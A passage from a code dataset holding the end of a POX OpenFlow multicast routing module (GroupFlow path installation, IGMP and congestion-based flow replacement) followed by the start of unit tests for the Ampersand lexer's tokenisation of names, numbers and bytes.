+ str(self.dst_mcast_address) + ': ' + str(reception_state))\n outgoing_rules = defaultdict(lambda : None)\n \n if not groupflow_trace_event is None:\n groupflow_trace_event.set_route_processing_start_time(self.dst_mcast_address, self.src_ip)\n \n # Calculate the paths for the specific receivers that are currently active from the previously\n # calculated mst\n edges_to_install = []\n calculated_path_router_dpids = []\n for receiver in reception_state:\n if receiver[0] == self.src_router_dpid:\n continue\n if receiver[0] in calculated_path_router_dpids:\n continue\n \n # log.debug('Building path for receiver on router: ' + dpid_to_str(receiver[0]))\n receiver_path = self.path_tree_map[receiver[0]]\n log.debug('Receiver path for receiver ' + str(receiver[0]) + ': ' + str(receiver_path))\n if receiver_path is None:\n log.warn('Path could not be determined for receiver ' + dpid_to_str(receiver[0]) + ' 
(network is not fully connected)')\n continue\n \n while receiver_path[1]:\n edges_to_install.append((receiver_path[1][0], receiver_path[0]))\n receiver_path = receiver_path[1]\n calculated_path_router_dpids.append(receiver[0])\n \n # Get rid of duplicates in the edge list (must be a more efficient way to do this, find it eventually)\n edges_to_install = list(Set(edges_to_install))\n if not edges_to_install is None:\n # log.info('Installing edges:')\n for edge in edges_to_install:\n log.debug('Installing: ' + str(edge[0]) + ' -> ' + str(edge[1]))\n \n if not groupflow_trace_event is None:\n groupflow_trace_event.set_route_processing_end_time()\n groupflow_trace_event.set_flow_installation_start_time()\n \n for edge in edges_to_install:\n if edge[0] in outgoing_rules:\n # Add the output action to an existing rule if it has already been generated\n output_port = self.groupflow_manager.adjacency[edge[0]][edge[1]]\n outgoing_rules[edge[0]].actions.append(of.ofp_action_output(port = output_port))\n #log.debug('ER: Configured router ' + dpid_to_str(edge[0]) + ' to forward group ' + \\\n # str(self.dst_mcast_address) + ' to next router ' + \\\n # dpid_to_str(edge[1]) + ' over port: ' + str(output_port))\n else:\n # Otherwise, generate a new flow mod\n msg = of.ofp_flow_mod()\n msg.hard_timeout = 0\n msg.idle_timeout = 0\n if edge[0] in self.installed_node_list:\n msg.command = of.OFPFC_MODIFY\n else:\n msg.command = of.OFPFC_ADD\n msg.match.dl_type = 0x800 # IPV4\n msg.match.nw_dst = self.dst_mcast_address\n msg.match.nw_src = self.src_ip\n msg.cookie = self.flow_cookie\n output_port = self.groupflow_manager.adjacency[edge[0]][edge[1]]\n msg.actions.append(of.ofp_action_output(port = output_port))\n outgoing_rules[edge[0]] = msg\n #log.debug('NR: Configured router ' + dpid_to_str(edge[0]) + ' to forward group ' + \\\n # str(self.dst_mcast_address) + ' to next router ' + \\\n # dpid_to_str(edge[1]) + ' over port: ' + str(output_port))\n \n for receiver in 
reception_state:\n if receiver[0] in outgoing_rules:\n # Add the output action to an existing rule if it has already been generated\n output_port = receiver[1]\n outgoing_rules[receiver[0]].actions.append(of.ofp_action_output(port = output_port))\n #log.debug('ER: Configured router ' + dpid_to_str(receiver[0]) + ' to forward group ' + \\\n # str(self.dst_mcast_address) + ' to network over port: ' + str(output_port))\n else:\n # Otherwise, generate a new flow mod\n msg = of.ofp_flow_mod()\n msg.hard_timeout = 0\n msg.idle_timeout = 0\n if receiver[0] in self.installed_node_list:\n msg.command = of.OFPFC_MODIFY\n else:\n msg.command = of.OFPFC_ADD\n msg.cookie = self.flow_cookie\n msg.match.dl_type = 0x800 # IPV4\n msg.match.nw_dst = self.dst_mcast_address\n msg.match.nw_src = self.src_ip\n output_port = receiver[1]\n msg.actions.append(of.ofp_action_output(port = output_port))\n outgoing_rules[receiver[0]] = msg\n #log.debug('NR: Configured router ' + dpid_to_str(receiver[0]) + ' to forward group ' + \\\n # str(self.dst_mcast_address) + ' to network over port: ' + str(output_port))\n \n # Setup empty rules for any router not involved in this path\n for router_dpid in self.node_list:\n if not router_dpid in outgoing_rules and router_dpid in self.installed_node_list:\n msg = of.ofp_flow_mod()\n msg.cookie = self.flow_cookie\n msg.match.dl_type = 0x800 # IPV4\n msg.match.nw_dst = self.dst_mcast_address\n msg.match.nw_src = self.src_ip\n msg.command = of.OFPFC_DELETE\n outgoing_rules[router_dpid] = msg\n #log.debug('Removed rule on router ' + dpid_to_str(router_dpid) + ' for group ' + str(self.dst_mcast_address))\n \n for router_dpid in outgoing_rules:\n connection = core.openflow.getConnection(router_dpid)\n if connection is not None:\n connection.send(outgoing_rules[router_dpid])\n if not outgoing_rules[router_dpid].command == of.OFPFC_DELETE:\n self.installed_node_list.append(router_dpid)\n else:\n self.installed_node_list.remove(router_dpid)\n else:\n 
log.warn('Could not get connection for router: ' + dpid_to_str(router_dpid))\n \n log.debug('New flows installed for Group: ' + str(self.dst_mcast_address) + ' Source: ' + str(self.src_ip) + ' FlowCookie: ' + str(self.flow_cookie))\n \n if self.groupflow_manager.flow_replacement_mode == PERIODIC_FLOW_REPLACEMENT and self._flow_replacement_timer is None:\n log.debug('Starting flow replacement timer for Group: ' + str(self.dst_mcast_address) + ' Source: ' + str(self.src_ip) + ' FlowCookie: ' + str(self.flow_cookie))\n self._flow_replacement_timer = Timer(self.groupflow_manager.flow_replacement_interval, self.update_flow_placement, recurring=True)\n \n if not groupflow_trace_event is None:\n groupflow_trace_event.set_flow_installation_end_time()\n core.groupflow_event_tracer.archive_trace_event(groupflow_trace_event)\n\n \n def remove_openflow_rules(self):\n \"\"\"Removes all OpenFlow rules associated with this multicast group / sender pair.\n\n This should be used when the group has no active receivers.\"\"\"\n log.info('Removing rules on all routers for Group: ' + str(self.dst_mcast_address) + ' Source: ' + str(self.src_ip))\n for router_dpid in self.node_list:\n msg = of.ofp_flow_mod()\n msg.cookie = self.flow_cookie\n msg.match.dl_type = 0x800 # IPV4\n msg.match.nw_dst = self.dst_mcast_address\n msg.match.nw_src = self.src_ip\n msg.match.in_port = None\n msg.command = of.OFPFC_DELETE\n connection = core.openflow.getConnection(router_dpid)\n if connection is not None:\n connection.send(msg)\n else:\n log.warn('Could not get connection for router: ' + dpid_to_str(router_dpid))\n self.installed_node_list = []\n \n if self._flow_replacement_timer is not None:\n self._flow_replacement_timer.cancel()\n self._flow_replacement_timer = None\n \n def update_flow_placement(self, groupflow_trace_event = None):\n \"\"\"Replaces the existing flows by recalculating the cached shortest path tree, and installing new OpenFlow rules.\"\"\"\n 
self.calc_path_tree_dijkstras(groupflow_trace_event)\n self.install_openflow_rules(groupflow_trace_event)\n log.info('Replaced flows for Group: ' + str(self.dst_mcast_address) + ' Source: ' + str(self.src_ip) + ' FlowCookie: ' + str(self.flow_cookie))\n \n\n\nclass GroupFlowManager(EventMixin):\n \"\"\"The GroupFlowManager implements multicast routing for OpenFlow networks.\"\"\"\n _core_name = \"openflow_groupflow\"\n \n def __init__(self, link_weight_type, static_link_weight, util_link_weight, flow_replacement_mode, flow_replacement_interval):\n # Listen to dependencies\n def startup():\n core.openflow.addListeners(self, priority = 99)\n core.openflow_igmp_manager.addListeners(self, priority = 99)\n core.openflow_flow_tracker.addListeners(self, priority = 99)\n\n self.link_weight_type = link_weight_type\n log.info('Set link weight type: ' + str(self.link_weight_type))\n self.static_link_weight = float(static_link_weight)\n if self.static_link_weight == 0:\n self.static_link_weight = sys.float_info.min\n self.util_link_weight = float(util_link_weight)\n log.info('Set StaticLinkWeight:' + str(self.static_link_weight) + ' UtilLinkWeight:' + str(self.util_link_weight))\n self.flow_replacement_mode = flow_replacement_mode\n self.flow_replacement_interval = flow_replacement_interval\n log.info('Set FlowReplacementMode:' + str(flow_replacement_mode) + ' FlowReplacementInterval:' + str(flow_replacement_interval) + ' seconds')\n \n self.adjacency = defaultdict(lambda : defaultdict(lambda : None))\n self.topology_graph = []\n self.node_set = Set()\n self.multicast_paths = defaultdict(lambda : defaultdict(lambda : None))\n self.multicast_paths_by_flow_cookie = {} # Stores references to the same objects as self.multicast_paths, except this map is keyed by flow_cookie\n self._next_mcast_group_cookie = 54345; # Arbitrary, not set to 1 to avoid conflicts with other modules\n \n # Desired reception state as delivered by the IGMP manager, keyed by the dpid of the router for 
which\n # the reception state applies\n self.desired_reception_state = defaultdict(lambda : None)\n \n # Setup listeners\n core.call_when_ready(startup, ('openflow', 'openflow_igmp_manager', 'openflow_flow_tracker'))\n \n def get_new_mcast_group_cookie(self):\n \"\"\"Returns a new, unique cookie which should be assigned to a multicast_group / sender pair.\n\n Using a unique cookie per multicast group / sender allows the FlowTracker module to accurately track\n bandwidth utilization on a per-flow basis.\n \"\"\"\n self._next_mcast_group_cookie += 1\n log.debug('Generated new flow cookie: ' + str(self._next_mcast_group_cookie - 1))\n return self._next_mcast_group_cookie - 1\n \n def get_reception_state(self, mcast_group, src_ip):\n \"\"\"Returns locations to which traffic must be routed for the specified multicast address and sender IP.\n\n Returns a list of tuples of the form (router_dpid, output_port).\n \"\"\"\n # log.debug('Calculating reception state for mcast group: ' + str(mcast_group) + ' Source: ' + str(src_ip))\n reception_state = []\n for router_dpid in self.desired_reception_state:\n # log.debug('Considering router: ' + dpid_to_str(router_dpid))\n if mcast_group in self.desired_reception_state[router_dpid]:\n for port in self.desired_reception_state[router_dpid][mcast_group]:\n if not self.desired_reception_state[router_dpid][mcast_group][port]:\n reception_state.append((router_dpid, port))\n # log.debug('Reception from all sources desired on port: ' + str(port))\n elif src_ip in self.desired_reception_state[router_dpid][mcast_group][port]:\n reception_state.append((router_dpid, port))\n # log.debug('Reception from specific source desired on port: ' + str(port))\n else:\n return reception_state\n\n \n def drop_packet(self, packet_in_event):\n \"\"\"Drops the packet represented by the PacketInEvent without any flow table modification\"\"\"\n msg = of.ofp_packet_out()\n msg.data = packet_in_event.ofp\n msg.buffer_id = packet_in_event.ofp.buffer_id\n 
msg.in_port = packet_in_event.port\n msg.actions = [] # No actions = drop packet\n packet_in_event.connection.send(msg)\n\n def get_topo_debug_str(self):\n debug_str = '\\n===== GroupFlow Learned Topology'\n for edge in self.topology_graph:\n debug_str += '\\n(' + dpid_to_str(edge[0]) + ',' + dpid_to_str(edge[1]) + ')'\n return debug_str + '\\n===== GroupFlow Learned Topology'\n \n def parse_topology_graph(self, adjacency_map):\n \"\"\"Parses an adjacency map into a node and edge graph (which is cached in self.topology_graph and self.node_set).\"\"\"\n new_topo_graph = []\n new_node_list = []\n for router1 in adjacency_map:\n for router2 in adjacency_map[router1]:\n new_topo_graph.append((router1, router2))\n if not router2 in new_node_list:\n new_node_list.append(router2)\n if not router1 in new_node_list:\n new_node_list.append(router1)\n self.topology_graph = new_topo_graph\n self.node_set = Set(new_node_list)\n \n def _handle_PacketIn(self, event):\n \"\"\"Processes PacketIn events to detect multicast sender IPs.\"\"\"\n router_dpid = event.connection.dpid\n if not router_dpid in self.node_set:\n # log.debug('Got packet from unrecognized router.')\n return # Ignore packets from unrecognized routers\n \n igmp_pkt = event.parsed.find(pkt.igmpv3)\n if not igmp_pkt is None:\n return # IGMP packets should be ignored by this module\n \n ipv4_pkt = event.parsed.find(pkt.ipv4)\n if not ipv4_pkt is None:\n # ==== IPv4 Packet ====\n # Check the destination address to see if this is a multicast packet\n if ipv4_pkt.dstip.inNetwork('224.0.0.0/4'):\n # Ignore multicast packets from adjacent routers\n for router_dpid2 in self.adjacency[router_dpid]:\n if self.adjacency[router_dpid][router_dpid2] == event.port:\n return\n \n group_reception = self.get_reception_state(ipv4_pkt.dstip, ipv4_pkt.srcip)\n if group_reception:\n if not self.multicast_paths[ipv4_pkt.dstip][ipv4_pkt.srcip] is None:\n log.debug('Got multicast packet from source which should already be configured 
Router: ' + dpid_to_str(event.dpid) + ' Port: ' + str(event.port))\n if ENABLE_OUT_OF_ORDER_PACKET_DELIVERY:\n # This may cause OFPBRC_BUFFER_UNKNOWN errors if the controller takes too long to respond\n # Send the packet back to the switch for forwarding\n msg = of.ofp_packet_out()\n msg.data = event.ofp\n msg.buffer_id = event.ofp.buffer_id\n msg.in_port = event.port\n msg.actions = [of.ofp_action_output(port = of.OFPP_TABLE)]\n event.connection.send(msg)\n return\n \n log.info('Got multicast packet from new source. Router: ' + dpid_to_str(event.dpid) + ' Port: ' + str(event.port))\n log.debug('Reception state for this group:')\n \n for receiver in group_reception:\n log.debug('Multicast Receiver: ' + dpid_to_str(receiver[0]) + ':' + str(receiver[1]))\n\n groupflow_trace_event = None\n try:\n groupflow_trace_event = core.groupflow_event_tracer.init_groupflow_event_trace()\n except:\n pass\n path_setup = MulticastPath(ipv4_pkt.srcip, router_dpid, event.port, ipv4_pkt.dstip, self, groupflow_trace_event)\n self.multicast_paths[ipv4_pkt.dstip][ipv4_pkt.srcip] = path_setup\n self.multicast_paths_by_flow_cookie[path_setup.flow_cookie] = path_setup\n path_setup.install_openflow_rules(groupflow_trace_event)\n \n def _handle_MulticastGroupEvent(self, event):\n \"\"\"Processes MulticastGroupEvents (generated by the IGMPManager module) and adjusts routing as neccesary to fulfill desired reception state\"\"\"\n log.debug(event.debug_str())\n # Save a copy of the old reception state to account for members which left a group\n old_reception_state = None\n if event.router_dpid in self.desired_reception_state:\n old_reception_state = self.desired_reception_state[event.router_dpid]\n \n # Set the new reception state\n self.desired_reception_state[event.router_dpid] = event.desired_reception\n log.info('Set new reception state for router: ' + dpid_to_str(event.router_dpid))\n \n # Build a list of all multicast groups that may be impacted by this change\n mcast_addr_list = []\n 
removed_mcast_addr_list = []\n for multicast_addr in self.desired_reception_state[event.router_dpid]:\n mcast_addr_list.append(multicast_addr)\n \n if not old_reception_state is None:\n for multicast_addr in old_reception_state:\n # Capture groups which were removed in this event\n if not multicast_addr in mcast_addr_list:\n log.info('Multicast group ' + str(multicast_addr) + ' no longer requires reception')\n removed_mcast_addr_list.append(multicast_addr)\n elif multicast_addr in self.desired_reception_state[event.router_dpid] \\\n and set(old_reception_state[multicast_addr]) == set(self.desired_reception_state[event.router_dpid][multicast_addr]):\n # Prevent processing of groups that did not change\n mcast_addr_list.remove(multicast_addr)\n log.debug('Prevented redundant processing of group: ' + str(multicast_addr))\n \n # Rebuild multicast trees for relevant multicast groups\n log.debug('Recalculating paths due to new reception state change')\n for multicast_addr in mcast_addr_list:\n if multicast_addr in self.multicast_paths:\n log.debug('Recalculating paths for group ' + str(multicast_addr))\n groupflow_trace_event = None\n try:\n groupflow_trace_event = core.groupflow_event_tracer.init_groupflow_event_trace(event.igmp_trace_event)\n except:\n pass\n for source in self.multicast_paths[multicast_addr]:\n log.info('Recalculating paths for group ' + str(multicast_addr) + ' Source: ' + str(source))\n self.multicast_paths[multicast_addr][source].install_openflow_rules(groupflow_trace_event)\n else:\n log.debug('No existing sources for group ' + str(multicast_addr))\n \n for multicast_addr in removed_mcast_addr_list:\n if multicast_addr in self.multicast_paths:\n sources_to_remove = []\n for source in self.multicast_paths[multicast_addr]:\n log.info('Removing flows for group ' + str(multicast_addr) + ' Source: ' + str(source))\n self.multicast_paths[multicast_addr][source].remove_openflow_rules()\n del 
self.multicast_paths_by_flow_cookie[self.multicast_paths[multicast_addr][source].flow_cookie]\n sources_to_remove.append(source)\n \n for source in sources_to_remove:\n del self.multicast_paths[multicast_addr][source]\n else:\n log.info('Removed multicast group ' + str(multicast_addr) + ' has no known paths')\n \n def _handle_MulticastTopoEvent(self, event):\n \"\"\"Processes MulticastTopoEvents (generated by the IGMPManager module) and adjusts routing as neccesary to account for topology changes\n \n Note: In the current implementation, this recalculates all multicast routes.\n \"\"\"\n # log.info(event.debug_str())\n self.adjacency = event.adjacency_map\n self.parse_topology_graph(event.adjacency_map)\n # log.info(self.get_topo_debug_str())\n\n if self.multicast_paths:\n log.warn('Multicast topology changed, recalculating all paths.')\n for multicast_addr in self.multicast_paths:\n for source in self.multicast_paths[multicast_addr]:\n groupflow_trace_event = None\n try:\n groupflow_trace_event = core.groupflow_event_tracer.init_groupflow_event_trace()\n except:\n pass\n self.multicast_paths[multicast_addr][source].update_flow_placement(groupflow_trace_event)\n \n def _handle_LinkUtilizationEvent(self, event):\n \"\"\"Processes LinkUtilizationEvents (generated by the FlowTracker module), and replaces flows that traverse the specified link\"\"\"\n \n if event.link_utilization >= core.openflow_flow_tracker.link_max_bw:\n log.debug('Link Fully Utilized! 
Switch:' + dpid_to_str(event.router_dpid) + ' Port:' + str(event.output_port))\n \n # Ignore the event if congestion threshold based flow replacement is not enabled\n if self.flow_replacement_mode != CONG_THRESHOLD_FLOW_REPLACEMENT:\n return\n \n log.debug('Got LinkUtilEvent - Switch: ' + dpid_to_str(event.router_dpid) + ' Port: ' + str(event.output_port) + '\\n\\tUtil: ' + str(event.link_utilization))\n \n replacement_time = time.time()\n \n # 1) Determine the amount of utilization that should be replaced to bring the link back under the congestion threshold\n replacement_utilization = event.link_utilization - event.cong_threshold\n if replacement_utilization < 0:\n log.warn('LinkUtilizationEvent specified negative replacement utilization.')\n return\n log.debug('Attempting replacement of ' + str(replacement_utilization) + ' Mbps of flows')\n \n # 2) Build a list of the flows managed by this module that are contributing to congestion, sorted by decreasing utilization\n replacement_flows = []\n for event_flow_cookie in event.flow_map:\n if event_flow_cookie in self.multicast_paths_by_flow_cookie:\n replacement_flows.append((event_flow_cookie, event.flow_map[event_flow_cookie]))\n replacement_flows.sort(key = lambda flow: flow[1])\n log.debug('Candidates for flow replacement: ' + str(replacement_flows))\n \n # 3) Replace flows until all candidates have been processed, or the targetted replacement utilization is reached\n # Note that flows which have been recently replaced will not be replaced again\n replaced_utilization = 0\n for flow in replacement_flows:\n log.debug('FlowCookie: ' + str(flow[0]) + ' CurrentTime: ' + str(replacement_time) + ' LastReplacementTime: ' + str(self.multicast_paths_by_flow_cookie[flow[0]]._last_flow_replacement_time))\n if self.multicast_paths_by_flow_cookie[flow[0]]._last_flow_replacement_time is not None:\n log.debug('Replacement Interval: ' + str(self.multicast_paths_by_flow_cookie[flow[0]]._last_flow_replacement_time))\n \n if 
(self.multicast_paths_by_flow_cookie[flow[0]]._last_flow_replacement_time is None) or (\n replacement_time - self.multicast_paths_by_flow_cookie[flow[0]]._last_flow_replacement_time >= self.flow_replacement_interval):\n log.debug('Replacing multicast flow with cookie: ' + str(flow[0]) + ' Bitrate: ' + str(flow[1]) + ' Mbps')\n self.multicast_paths_by_flow_cookie[flow[0]].update_flow_placement()\n \n replaced_utilization += flow[1]\n # Note: This causes the replacement to stop after replacing a single flow (may help prevent thrashing)\n # Uncomment this to have the module replace flows until the current link utilization minus the replacement bandwidth \n # is less than the link's congestion threshold.\n break\n \n # Note: Flows which are not actually replaced are counted toward the replacement utilization here, as it assumed that these flows\n # are already in the process of being replaced (this assumption should hold valid as long as the flow replacement interval is not\n # greater than 3 sampling intervals of the flow tracker)\n if replaced_utilization >= replacement_utilization:\n break\n \n log.debug('Replaced ' + str(replaced_utilization) + ' Mbps of flows')\n\n\ndef launch(link_weight_type = 'linear', static_link_weight = STATIC_LINK_WEIGHT, util_link_weight = UTILIZATION_LINK_WEIGHT, \n flow_replacement_mode = 'none', flow_replacement_interval = FLOW_REPLACEMENT_INTERVAL_SECONDS):\n # Method called by the POX core when launching the module\n link_weight_type_enum = LINK_WEIGHT_LINEAR # Default\n if 'linear' in str(link_weight_type):\n link_weight_type_enum = LINK_WEIGHT_LINEAR\n elif 'exponential' in str(link_weight_type):\n link_weight_type_enum = LINK_WEIGHT_EXPONENTIAL\n \n flow_replacement_mode_int = NO_FLOW_REPLACEMENT\n if 'periodic' in str(flow_replacement_mode):\n flow_replacement_mode_int = PERIODIC_FLOW_REPLACEMENT\n if 'cong_threshold' in str(flow_replacement_mode):\n flow_replacement_mode_int = CONG_THRESHOLD_FLOW_REPLACEMENT\n \n 
groupflow_manager = GroupFlowManager(link_weight_type_enum, float(static_link_weight), float(util_link_weight), flow_replacement_mode_int,\n float(flow_replacement_interval))\n core.register('openflow_groupflow', groupflow_manager)","sub_path":"mymcast/pox/openflow/groupflow.py","file_name":"groupflow.py","file_ext":"py","file_size_in_byte":39177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"224330479","text":"# Copyright 2015-2016 Nigel Small\n#\n# This file is part of Ampersand.\n#\n# Ampersand is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Ampersand is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Ampersand. 
If not, see .\n\nfrom ampersand import TokenStream, TokenType, Script\nfrom functools import reduce\nfrom itertools import combinations, product\nfrom unittest import TestCase\n\n\nclass TokenStreamTest(object):\n\n def __init__(self, source):\n self.source = source\n source_bytes = source.encode(\"utf-8\")\n self.script = Script(source_bytes)\n self.tokens = self.script.lines[0].tokens\n\n def assert_tokens(self, *expected):\n try:\n for i, token in enumerate(self.tokens):\n assert token == expected[i], \\\n \"%r does not lex correctly; token %d incorrect\\n%s != %s\" % \\\n (self.source, i, self.tokens, expected)\n except IndexError:\n assert False, \"%r does not lex correctly; tokens incorrect\\n%s != %s\" % \\\n (self.source, self.tokens, expected)\n\n\nclass NameTestCase(TestCase):\n \"\"\" A name token is composed of a head character followed by zero\n or more tail characters. Valid head characters are those classified\n by Unicode as letters (Ll|Lm|Lo|Lt|Lu), connectors (Pc) and\n currency symbols (Sc). 
Tail characters can also be any of these as\n well as numbers (Nd|Nl|No), non-spacing marks (Mn) and spacing\n combining marks (Mc).\n \"\"\"\n\n names = [\n \"n\",\n \"_\",\n \"__\",\n \"name\",\n \"a_name\",\n \"_a_name_\",\n \"__a__name__\",\n \"name_1\",\n \"_1st_name\",\n \"_1º_name\",\n \"_1ª_name\",\n \"ñâmé\",\n \"µname\",\n \"$\",\n \"¢\",\n \"£\",\n \"¤\",\n \"¥\",\n \"€\",\n \"$jquery\",\n \"STR$\",\n ]\n\n def test_names(self):\n for source in self.names:\n name_bytes = source.encode(\"utf-8\")\n tokens = list(TokenStream(name_bytes))\n assert len(tokens) == 2, \"%r does not contain 2 tokens\" % source\n token = tokens[1]\n expected_token = (TokenType.name, 0, 0, 0.0, name_bytes)\n assert token == expected_token, \"%r does not lex correctly\" % source\n\n\nclass NaturalTestCase(TestCase):\n\n numbers = [\n (\"0\", 0),\n (\"1\", 1),\n (\"1234\", 1234),\n (\"1_234\", 1234),\n (\"1__2__3__4__\", 1234),\n ]\n\n def test_natural_numbers(self):\n for source, value in self.numbers:\n TokenStreamTest(source).assert_tokens(\n (TokenType.natural, value, 0, 0.0, b\"\"),\n )\n\n def test_positive_integers(self):\n for source, value in self.numbers:\n TokenStreamTest(\"+\" + source).assert_tokens(\n (TokenType.symbol, ord(\"+\"), 0, 0.0, b\"+\"),\n (TokenType.natural, value, 0, 0.0, b\"\"),\n )\n\n def test_negative_integers(self):\n for source, value in self.numbers:\n TokenStreamTest(\"-\" + source).assert_tokens(\n (TokenType.symbol, ord(\"-\"), 0, 0.0, b\"-\"),\n (TokenType.natural, value, 0, 0.0, b\"\"),\n )\n\n def test_natural_numbers_with_units(self):\n for source, value in self.numbers:\n TokenStreamTest(source + \"B\").assert_tokens(\n (TokenType.natural, value, 0, 0.0, b\"B\"),\n )\n\n def test_natural_number_units_must_be_adjacent(self):\n for source, value in self.numbers:\n TokenStreamTest(source + \" B\").assert_tokens(\n (TokenType.natural, value, 0, 0.0, b\"\"),\n (TokenType.name, 0, 0, 0.0, b\"B\"),\n )\n\n\nclass 
RationalNumberTestCase(TestCase):\n\n fractions = [\n (\"¼\", 1, 4),\n (\"½\", 1, 2),\n (\"¾\", 3, 4),\n (\"⅐\", 1, 7),\n (\"⅑\", 1, 9),\n (\"⅒\", 1, 10),\n (\"⅓\", 1, 3),\n (\"⅔\", 2, 3),\n (\"⅕\", 1, 5),\n (\"⅖\", 2, 5),\n (\"⅗\", 3, 5),\n (\"⅘\", 4, 5),\n (\"⅙\", 1, 6),\n (\"⅚\", 5, 6),\n (\"⅛\", 1, 8),\n (\"⅜\", 3, 8),\n (\"⅝\", 5, 8),\n (\"⅞\", 7, 8),\n (\"↉\", 0, 3),\n (\"1¼\", 5, 4),\n (\"1½\", 3, 2),\n (\"1¾\", 7, 4),\n ]\n\n percentages = [\n (\"0%\", 0, 100),\n (\"1½%\", 3, 200),\n (\"37⅞%\", 303, 800),\n (\"10%\", 10, 100),\n (\"50%\", 50, 100),\n (\"100%\", 100, 100),\n (\"1000%\", 1000, 100),\n ]\n\n def test_rational_numbers(self):\n for source, numerator, denominator in self.fractions + self.percentages:\n TokenStreamTest(source).assert_tokens(\n (TokenType.rational, numerator, denominator, 0.0, b\"\"),\n )\n\n def test_positive_rational_numbers(self):\n for source, numerator, denominator in self.fractions + self.percentages:\n TokenStreamTest(\"+\" + source).assert_tokens(\n (TokenType.symbol, ord(\"+\"), 0, 0.0, b\"+\"),\n (TokenType.rational, numerator, denominator, 0.0, b\"\"),\n )\n\n def test_negative_rational_numbers(self):\n for source, numerator, denominator in self.fractions + self.percentages:\n TokenStreamTest(\"-\" + source).assert_tokens(\n (TokenType.symbol, ord(\"-\"), 0, 0.0, b\"-\"),\n (TokenType.rational, numerator, denominator, 0.0, b\"\"),\n )\n\n def test_rational_numbers_with_units(self):\n for source, numerator, denominator in self.fractions + self.percentages:\n TokenStreamTest(source + \"kB\").assert_tokens(\n (TokenType.rational, numerator, denominator, 0.0, b\"kB\"),\n )\n\n def test_rational_number_units_must_be_adjacent(self):\n for source, numerator, denominator in self.fractions + self.percentages:\n TokenStreamTest(source + \" kB\").assert_tokens(\n (TokenType.rational, numerator, denominator, 0.0, b\"\"),\n (TokenType.name, 0, 0, 0.0, b\"kB\"),\n )\n\n\nclass RealNumberTestCase(TestCase):\n\n formats = [\"{x}.\", 
\".{y}\", \"{x}.{y}\", \"{x}{e}{z}\", \"{x}.{e}{z}\", \".{y}{e}{z}\", \"{x}.{y}{e}{z}\"]\n x_values = [\"5\", \"5_\"]\n y_values = [\"8\", \"8_\"]\n e_values = [\"E\", \"e\", \"⏨\"]\n z_values = [\"1\", \"1_\", \"+1\", \"+1_\", \"+1\", \"+1_\"]\n\n numbers = set(f[0].format(**dict(zip(\"xyez\", f[1:])))\n for f in product(formats, x_values, y_values, e_values, z_values))\n\n def test_real_numbers(self):\n for source in self.numbers:\n expected_value = float(source.replace(\"_\", \"\").replace(\"⏨\", \"E\"))\n # print(\"%s -> %f\" % (source, expected_value))\n TokenStreamTest(source).assert_tokens(\n (TokenType.real, 0, 0, expected_value, b\"\"),\n )\n\n def test_real_numbers_with_units(self):\n for source in self.numbers:\n expected_value = float(source.replace(\"_\", \"\").replace(\"⏨\", \"E\"))\n # print(\"%s -> %f\" % (source, expected_value))\n TokenStreamTest(source + \"kB\").assert_tokens(\n (TokenType.real, 0, 0, expected_value, b\"kB\"),\n )\n\n def test_real_number_units_must_be_adjacent(self):\n for source in self.numbers:\n expected_value = float(source.replace(\"_\", \"\").replace(\"⏨\", \"E\"))\n # print(\"%s -> %f\" % (source, expected_value))\n TokenStreamTest(source + \" kB\").assert_tokens(\n (TokenType.real, 0, 0, expected_value, b\"\"),\n (TokenType.name, 0, 0, 0.0, b\"kB\"),\n )\n\n\nclass BytesTestCase(TestCase):\n\n numbers = [\n (\"#0\", b\"\\x00\"),\n (\"#1\", b\"\\x01\"),\n (\"#F\", b\"\\x0F\"),\n (\"#00\", b\"\\x00\"),\n (\"#01\", b\"\\x01\"),\n (\"#0F\", b\"\\x0F\"),\n (\"#FF\", b\"\\xFF\"),\n (\"#000\", b\"\\x00\\x00\"),\n (\"#001\", b\"\\x00\\x01\"),\n (\"#0FF\", b\"\\x00\\xFF\"),\n (\"#FFF\", b\"\\x0F\\xFF\"),\n (\"#0FFF\", b\"\\x0F\\xFF\"),\n (\"#FFFF\", b\"\\xFF\\xFF\"),\n (\"#00_00_00_01\", b\"\\x00\\x00\\x00\\x01\"),\n (\"#1234\", b\"\\x12\\x34\"),\n (\"#ABCD\", b\"\\xAB\\xCD\"),\n (\"#abcd\", b\"\\xAB\\xCD\"),\n (\"#1234ABCD\", b\"\\x12\\x34\\xAB\\xCD\"),\n (\"#1234abcd\", b\"\\x12\\x34\\xAB\\xCD\"),\n (\"#ABCD1234\", 
b\"\\xAB\\xCD\\x12\\x34\"),\n (\"#abcd1234\", b\"\\xAB\\xCD\\x12\\x34\"),\n (\"#12_34A_BCD\", b\"\\x12\\x34\\xAB\\xCD\"),\n (\"#AB_CD1_234\", b\"\\xAB\\xCD\\x12\\x34\"),\n (\"#01234ABCD\", b\"\\x00\\x12\\x34\\xAB\\xCD\"),\n (\"#1234_\", b\"\\x12\\x34\"),\n (\"#ABCD_\", b\"\\xAB\\xCD\"),\n ]\n\n def test_bytes(self):\n for source, value in self.numbers:\n TokenStreamTest(source).assert_tokens(\n (TokenType.bytes, len(value), 0, 0.0, value),\n )\n\n def test_bytes_and_continue_parsing(self):\n for source, value in self.numbers:\n TokenStreamTest(source + \":\" + source).assert_tokens(\n (TokenType.bytes, len(value), 0, 0.0, value),\n (TokenType.symbol, ord(\":\"), 0, 0.0, b\":\"),\n (TokenType.bytes, len(value), 0, 0.0, value),\n )\n\n\nclass SymbolTestCase(TestCase):\n\n symbols = {\n \"--\",\n \"->\",\n \">>\",\n \"---\",\n \"-->\",\n \"->>\",\n \">>>\",\n }\n\n def symbol_combinations(self):\n symbol_combinations = set()\n for combo in reduce(set.__or__, [set(combinations(self.symbols, i))\n for i in range(len(self.symbols) + 1)], set()):\n full_combo = set()\n for symbol in combo:\n for i in range(2, len(symbol) + 1):\n full_combo.add(symbol[:i])\n symbol_combinations.add(tuple(sorted(full_combo)))\n return sorted(symbol_combinations)\n\n def test_composite_symbols(self):\n for valid_symbols in sorted(self.symbol_combinations()):\n for symbol in sorted(self.symbols):\n expression = \"5 %s 8\" % symbol\n tokens = Script(expression.encode(\"utf-8\"), 